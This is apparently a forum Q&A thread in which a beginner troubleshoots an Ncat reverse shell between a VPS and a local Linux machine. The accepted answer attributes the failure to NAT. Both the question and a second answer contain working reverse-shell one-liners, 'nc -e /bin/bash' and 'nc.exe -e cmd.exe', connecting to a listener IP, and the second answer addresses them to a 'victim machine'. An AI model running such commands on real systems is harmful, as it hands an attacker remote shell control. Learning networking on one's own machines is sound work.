skip to Main Content

I’m facing a problem establishing a reverse shell using the Ncat (Nmap’s tool). At first it worked properly, but when I swap the target and attacking machine it doesn’t.

Case 1: I set up a Ubuntu virtual private server (IP Address: 172.105.253.156), here the Ubuntu machine is my attacking machine and my local Linux machine is the target. Then I executed this command on my attacking machine:

ncat -lnv 172.105.253.156 489

Now I attempted to connect to my attacking machine from my local machine(target), so, I executed this:

ncat -e "/bin/bash" 172.105.253.156 489

by doing so the reverse shell is perfectly established.

Case 2: But here when I tried to swap my machines & listen for the target on my local machine and so by trying to connect to the attacker (my local Linux machine) from the Ubuntu machine (target) there’s no connection established between them.

I’m completely new to the concept of reverse shells.

2

Answers


  1. Chosen as BEST ANSWER
    • Case 1: As it's a reverse shell connection my firewall is freely allowing the outbound connection, so that I could connect to the victim's machine, and noticeably here the attacker is not behind the NAT.
    • Case 2: But when my machine is listening for the victim. And, when victim try to connect to my machine,as it's hidden behind NAT, it doesn't work.

    By trying the same thing on a VM by configuring the network-adapter to Bridged Mode (not NAT) will help and port-forwarding would also work perfectly.


  2. On your machine

    nc -nlvp 172.105.253.156 489
    

    On the victim machine

    nc 172.105.253.156 489 –e /bin/bash
    

    OR for Windows

    nc.exe 172.105.253.156 489 –e cmd.exe
    

    For reference: https://www.hackingtutorials.org/networking/hacking-netcat-part-2-bind-reverse-shells/

    Login or Signup to reply.
Please signup or login to give your own answer.
Back To Top
Search